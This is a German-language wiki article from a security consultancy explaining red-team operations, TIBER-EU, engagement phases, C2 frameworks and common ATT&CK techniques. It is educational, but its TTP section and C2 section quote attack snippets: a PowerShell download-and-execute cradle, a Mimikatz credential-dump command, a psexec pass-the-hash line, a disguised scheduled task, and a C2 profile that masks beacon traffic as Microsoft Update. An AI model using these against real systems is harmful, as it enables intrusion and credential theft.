Zum Inhalt springen

Services, Wiki-Artikel, Blog-Beiträge und Glossar-Einträge durchsuchen

↑↓NavigierenEnterÖffnenESCSchließen

Red Teaming: Angriffssimulationen professionell durchführen

Umfassender Guide zu Red-Team-Operationen: Unterschied zu Penetrationstests, TIBER-EU-Rahmenwerk, Red-Team-Phasen (Reconnaissance bis Reporting), C2-Infrastruktur, häufig genutzte TTPs und wie Unternehmen von Red Team Engagements profitieren.

Inhaltsverzeichnis (6 Abschnitte)

Red Teaming ist die realistischste Form der Sicherheitsüberprüfung: Ein spezialisiertes Team simuliert einen echten, zielgerichteten Angriff - mit denselben Methoden, Werkzeugen und Denkweise die tatsächliche Angreifergruppen einsetzen würden. Im Gegensatz zu einem Penetrationstest gibt es kein definiertes Scope, kein vorher vereinbartes Ziel - nur die Mission: “Kommt an die Kronjuwelen heran.”

Red Team vs. Penetrationstest

Penetrationstest:
  Umfang:       Definierter Scope (z.B. 5 IP-Ranges, 2 Webanwendungen)
  Ziel:         Möglichst alle technischen Schwachstellen finden
  Dauer:        5-30 Tage
  Wissen:       Oft Grey-Box (Zugangsdaten, Source Code bekannt)
  Blue-Team:    Weiß dass Test stattfindet (whitebox oder greybox)
  Outcome:      Liste aller gefundenen Schwachstellen + Empfehlungen

Red Team Operation:
  Umfang:       Gesamte Organisation (Menschen, Prozesse, Technik)
  Ziel:         "Crown Jewels" erreichen (z.B. AD kompromittieren,
                 Produktionsdatenbank lesen, CEO-Konto übernehmen)
  Dauer:        4-12 Wochen
  Wissen:       Black-Box (wie ein echter Angreifer)
  Blue-Team:    Weiß NICHT dass Übung läuft! (echte Erkennung testen)
  Outcome:      Realistische Bewertung der Erkennungs- und Reaktionsfähigkeit

Wann Penetrationstest, wann Red Team?

  Penetrationstest wenn:
    → Neue Systeme vor Go-Live prüfen
    → Compliance-Anforderung (ISO 27001, PCI DSS)
    → Bekannte Sicherheitslücken prüfen
    → Begrenzte Ressourcen (Budget, Zeit)

  Red Team wenn:
    → Reife Sicherheitsorganisation (SOC vorhanden!)
    → Erkennungs- und Reaktionsfähigkeit testen
    → Realistische Angreifer-Simulation (APT-Niveau)
    → TIBER-EU / DORA-Compliance (Finanzsektor)
    → Nach mehreren erfolgreichen Pentests als nächste Stufe

TIBER-EU - Red Teaming im Finanzsektor

TIBER-EU (Threat Intelligence-based Ethical Red Teaming):
  → Von der EZB und nationalen Notenbanken entwickelt
  → Verpflichtend für systemrelevante Finanzinstitute (DORA-Konformität)
  → In Deutschland: TIBER-DE (Bundesbank-Umsetzung)
  → NIS2: kritische Infrastrukturen zunehmend ähnliche Anforderungen

TIBER-EU Phasen:
  Phase 1 - Generic Threat Intelligence:
    → Threat Intelligence Provider analysiert: welche Angreifergruppen
      zielen typischerweise auf Institute dieser Art und Größe?
    → Output: Threat Landscape Report (TLR)

  Phase 2 - Targeted Threat Intelligence:
    → Spezifische Recherche über das Institut:
      Welche Systeme? Welche Mitarbeiter? Welche Angriffsvektoren?
    → Output: Targeted Threat Intelligence (TTI) Report

  Phase 3 - Red Team Test:
    → 12 Wochen Simulation mit TTI-basierten Szenarien
    → Realistische APT-Methoden (MITRE ATT&CK)
    → Blue Team weiß nicht dass Test läuft!

  Phase 4 - Closure:
    → Findings werden mit Blue Team geteilt
    → Remediation-Plan erstellt
    → Zertifikat / Purple Team Session

TIBER-EU Lieferobjekte:
  → Scoped Red Team Test Report (vertraulich)
  → Purple Team Report (MITRE ATT&CK Coverage)
  → Remediation Tracker

Red Team Phasen - PTES-Erweiterung für Full-Scope

Phase 1: Pre-Engagement (2-4 Wochen)
  → Rules of Engagement (RoE) definieren:
    - Was darf simuliert werden? (Ransomware? DDoS? Physischer Einbruch?)
    - Get-out-of-jail-Karte: wen anrufen wenn Alarm ausgelöst?
    - Emergency Stop: Kriterien für sofortigen Abbruch
    - Scoping: welche Systeme sind out-of-scope? (Produktionsdatenbanken?)
  → Crown Jewels definieren (mit Management):
    "Was ist das schlimmste was einem Angreifer gelingen könnte?"
  → Threat Intelligence über die Organisation sammeln

Phase 2: OSINT und externe Reconnaissance (1-2 Wochen)
  → LinkedIn: Mitarbeiter, Technologien, IT-Dienstleister
  → OSINT: öffentliche Code-Repos, Paste-Sites, Darknet
  → Shodan/Censys: externe Angriffsfläche
  → Domain-Reconnaissance: Subdomains, MX, SPF, DKIM
  → Credential-Leaks: HaveIBeenPwned, Darknet-Suche

Phase 3: Initial Access versuchen (2-4 Wochen)
  → Spear-Phishing-Kampagne mit OSINT-Erkenntnissen
  → Passwort-Spray auf VPN/OWA (geleakte Credentials)
  → Exploitation öffentlicher Dienste (Web-App, VPN-CVE)
  → Physischer Zugang (Social Engineering, Badgecloning)
  → Supply Chain (Drittanbieter-Zugang)

Phase 4: Post-Exploitation und Lateral Movement (2-4 Wochen)
  → Privilege Escalation: von User zu Admin zu Domain Admin
  → Credential Harvesting: Mimikatz, LaZagne, Browser-Passwörter
  → Lateral Movement: PsExec, WMI, Pass-the-Hash
  → Persistence: Registry, Scheduled Tasks, Golden Ticket
  → C2-Kommunikation aufrechterhalten

Phase 5: Crown Jewels erreichen
  → Definierte Ziele erreichen:
    - AD-Vollkompromittierung (DCSync, Domain Admin)
    - Zugriff auf Produktionsdatenbank
    - CEO-Postfach lesen
    - Ransomware auf Testrechner deployen
  → Dokumentation aller Schritte (Timestamps, Screenshots)

Phase 6: Reporting und Purple Team
  → Executive Summary: "Wir haben X in Y Wochen erreicht"
  → Technical Report: jede TTP mit Beweis
  → MITRE ATT&CK Navigator: welche TTPs wurden genutzt/erkannt?
  → Purple Team Session: Blue Team sieht was Red Team gemacht hat
  → Remediation: gemeinsamer Aktionsplan

C2-Framework - Command and Control

C2 (Command and Control) ist die Kommunikationsinfrastruktur des Red Teams:
  → Implants auf kompromittierten Systemen
  → Verschlüsselte Verbindung zum C2-Server
  → Befehle senden, Daten exfiltrieren, persistent bleiben

Professionelle C2-Frameworks (nur für autorisiertes Red Teaming!):

Cobalt Strike:
  → Goldstandard für Red Teams
  → Beacon: modulares Implant (HTTP/HTTPS/DNS/SMB Kommunikation)
  → Malleable C2 Profiles: Beacon sieht aus wie legitimer Traffic
  → Kommerziell, teuer (~3.500 USD/Jahr pro Nutzer)
  → Auch von Ransomware-Gruppen missbraucht!

Havoc (Open Source Alternative):
  → Python-basierter C2 (ähnlich zu Cobalt Strike)
  → Kostenlos, aktiv entwickelt
  → Weniger gut erkannt von EDR-Systemen (da neuer)

Mythic (Open Source):
  → Modulares C2-Framework mit Web-UI
  → 70+ Agenten (Payloads) verfügbar
  → Multi-Operator-Support für große Red Teams

Brute Ratel C4 (BRc4):
  → Kommerziell, entwickelt von ehemaligen EDR-Ingenieuren
  → Speziell designt um EDR zu umgehen

---

Malleable C2 Profiles (Tarnung des Beacon-Traffics):

  Standardmäßig: Beacon sendet HTTP-Requests die wie Cobalt Strike aussehen
  → EDR und NDR erkennen das Pattern!

  Mit Malleable Profile: Traffic sieht aus wie legitimer Service

  # Beispiel: Traffic getarnt als Microsoft Update
  http-get {
    set uri "/windowsupdate/v6/GetManifest.aspx";
    client {
      header "Host" "update.microsoft.com";
      header "User-Agent" "Windows-Update-Agent/10.0.10011.16384";
      metadata {
        base64url;
        parameter "CatalogID";
      }
    }
  }

  → NDR sieht: normaler HTTP-Traffic zu microsoft.com-ähnlicher Domain
  → Tatsächlich: C2-Kommunikation mit Red-Team-Server

---

C2-Infrastruktur Aufbau (Teamserver):

  Red Team Server (VPS bei Cloud-Provider):
    → Redirector davor (verhindert direkten C2-IP-Fingerabdruck)
    → CDN-Nutzung (Cloudflare) für Tarnung
    → Domain-Fronting (Domain gehört CDN, Traffic geht zu C2)

  Domain-Auswahl:
    → Aged Domain (> 1 Jahr alt) → bessere Reputation
    → "Kategorisiert" in Web-Proxy-Datenbanken (z.B. als Business)
    → Ähnlich zu legitimen Domains (microsoft-update.net statt c2.evil.com)

Häufige Red Team TTPs

MITRE ATT&CK Techniken die Red Teams häufig einsetzen:

Initial Access:
  T1566.001 Spear Phishing Attachment:
    → Word/Excel mit Makros oder ISO-File
    → HTML-Smuggling: Payload wird im Browser assembliert
  T1190 Exploit Public-Facing Application:
    → Log4Shell, Citrix, Exchange ProxyLogon

Execution:
  T1059.001 PowerShell:
    → Cradles: IEX (New-Object Net.WebClient).downloadString("http://...")
    → AMSI-Bypass: Umgehung des Antivirus-Scanners
  T1059.003 Windows Command Shell

Persistence:
  T1053.005 Scheduled Task:
    → schtasks /create /tn "Windows Defender Update" /tr "..."
  T1547.001 Registry Run Keys

Privilege Escalation:
  T1078 Valid Accounts (Credentials erbeutet)
  T1134 Access Token Manipulation

Defense Evasion:
  T1562.001 Impair Defenses: Disable AV
  T1070.004 File Deletion: Event Logs löschen
  T1027 Obfuscated Files or Information

Credential Access:
  T1003.001 LSASS Memory (Mimikatz):
    sekurlsa::logonpasswords
  T1558.003 Kerberoasting:
    Request Service Tickets → Offline Crack

Lateral Movement:
  T1021.002 SMB/Windows Admin Shares (PsExec):
    psexec \\target -u admin -p hash cmd.exe
  T1021.006 Windows Remote Management (WinRM):
    Enter-PSSession -ComputerName target

Exfiltration:
  T1048 Exfiltration Over Alternative Protocol:
    → DNS-Tunneling (dnscat2, iodine)
    → ICMP-Tunneling (icmpsh)
  T1041 Exfiltration Over C2 Channel

Red Team Report - Struktur

Executive Summary (2-3 Seiten):
  → Zeitraum und Scope
  → Ziele und ob/wie sie erreicht wurden
  → Kritische Findings in 3-5 Bullet Points
  → Gesamtrisikobewertung
  → Wichtigste Sofortmaßnahmen

Attack Narrative (Kernstück):
  → Chronologischer Ablauf des Angriffs
  → "Tag 1: Spear-Phishing-Mail an 3 Targets..."
  → "Tag 7: Domain Admin durch Kerberoasting..."
  → Screenshots, Timestamps, Beweise
  → Für Nicht-Techniker verständlich!

Technical Findings:
  → Jedes Finding mit:
    - MITRE ATT&CK Technik (T-Nummer)
    - CVSS Score
    - Beweis (Screenshot, Log-Auszug)
    - Sofortmaßnahme
    - Langfristige Maßnahme

MITRE ATT&CK Abdeckung:
  → Welche TTPs wurden eingesetzt?
  → Welche hat Blue Team erkannt?
  → Welche hat Blue Team NICHT erkannt?
  → Navigator-Export für Visualisierung

Remediation Roadmap:
  → Sofortmaßnahmen (< 7 Tage): kritische Lücken schließen
  → Kurzfristig (< 30 Tage): wichtige Härtung
  → Mittelfristig (< 90 Tage): strukturelle Verbesserungen
  → Langfristig (< 1 Jahr): Architekturverbesserungen

Fragen zu diesem Thema?

Unsere Experten beraten Sie kostenlos und unverbindlich.

Erstberatung

Über den Autor

Vincent Heinen
Vincent Heinen

Abteilungsleiter Offensive Services

PGP 1DDAA57F2B972787

M.Sc. IT-Sicherheit mit über 5 Jahren Erfahrung in offensiver Sicherheitsanalyse. Leitet die Durchführung von Penetrationstests mit Spezialisierung auf Web-Applikationen, Netzwerk-Infrastruktur, Reverse Engineering und Hardware-Sicherheit. Verantwortlich für mehrere Responsible Disclosures.

Responsible Disclosures: CVE-2023-0865 CVE-2025-43579 CVE-2025-53533
OSCP+ OSCP OSWP OSWA
Vollständiges Profil ansehen
Dieser Artikel wurde zuletzt am 04.03.2026 bearbeitet. Verantwortlich: Vincent Heinen, Abteilungsleiter Offensive Services bei AWARE7 GmbH. Lizenz: CC BY 4.0 — freie Nutzung mit Namensnennung: „AWARE7 GmbH, https://a7.de

Cookielose Analyse via Matomo (selbst gehostet, kein Tracking-Cookie). Datenschutzerklärung